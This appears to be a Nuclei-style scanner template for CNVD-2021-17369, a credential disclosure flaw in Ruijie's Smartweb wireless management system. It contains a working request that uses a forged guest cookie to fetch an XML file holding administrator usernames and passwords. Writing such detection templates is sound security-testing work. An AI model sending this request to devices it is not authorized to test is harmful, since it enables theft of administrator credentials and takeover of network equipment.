id: CNVD-2021-17369

info:
  name: Ruijie Smartweb Management System Password Information Disclosure
  author: pikpikcu
  severity: high
  description: The wireless smartweb management system of Ruijie Networks Co., Ltd. has a logic flaw. An attacker can obtain the administrator account and password from a low-privileged user, thereby escalating the low-level privilege to the administrator's privilege.
  reference:
    - https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 1
  tags: ruijie,disclosure,cnvd,cnvd2021

http:
  - method: GET
    path:
      - "{{BaseURL}}/web/xml/webuser-auth.xml"

    headers:
      Cookie: login=1; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<userauth>"
          - "<password>"
        condition: and

      - type: status
        status:
          - 200

# digest: 490a0046304402206bce9ad07810b0c2ef9e3788ab1095e2b2c9d9c8806818fc3b036853c69ff60a02202b9b856f782fa62eb1b220a3e9ca62f57a4e710eec345007786a5bf628896034:922c64590222798bb761d5b6d8e72950
